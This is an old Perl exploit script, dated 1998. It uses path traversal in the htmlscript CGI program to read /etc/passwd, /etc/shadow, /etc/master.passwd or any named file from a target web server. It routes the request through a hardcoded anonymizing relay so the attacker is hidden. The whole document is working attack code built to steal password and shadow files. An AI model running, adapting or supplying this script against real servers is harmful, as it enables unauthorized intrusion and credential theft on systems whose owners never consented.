#!/usr/bin/perl -w
#	$Id: htmlscript.pl,v 1.1 1998/01/29 06:28:52 zap Exp $
#
# Retrieve /etc/{passwd,shadow,master.passwd} or specified file from
# servers running vulnerable version of htmlscript. The HTTP request will
# go through an anonymous onion router.
#
# Copyright (c) 1998 by zap <zap@arosnet.se>
#
# $Log: htmlscript.pl,v $
# Revision 1.1  1998/01/29 06:28:52  zap
# Initial revision
#

use strict;
use Socket;

my ($verbose, $onion_router, $onion_port, $onion_timeout, $iaddr, $paddr,
    $proto, $line);

$verbose	= 1;
$onion_router	= "132.250.80.12";
$onion_port	= 9200;
$onion_timeout	= 10;
$iaddr		= inet_aton($onion_router);
$paddr		= sockaddr_in($onion_port, $iaddr);
$proto		= getprotobyname("tcp");

my ($victim, $file) = @ARGV or die "Usage: httpscript.pl <host> [<file>]\n";

sub get_file {
	$SIG{"ALRM"}    = sub { close(ONION); };
	alarm $onion_timeout;
	
	socket(ONION, AF_INET, SOCK_STREAM, $proto);
	select(ONION); $| = 1; select(STDOUT);

	if (connect(ONION, $paddr)) {
		$SIG{"ALRM"} = "IGNORE";
		print "[ $victim:$file ]\n" if $verbose;
		print ONION "GET http://$victim/cgi-bin/htmlscript?../../../",
			    "../../../../..$file\n\n";
		while (defined($line = <ONION>)) { print $line }
	} else {
		die "Error: Connection to onion router $onion_router timed ",
		    "out ($onion_timeout\s).\n";
	}
	close(ONION);
}

if ($file) { get_file; } else {
	$file = "/etc/passwd"; get_file;
	$file = "/etc/shadow"; get_file;
	$file = "/etc/master.passwd"; get_file;
}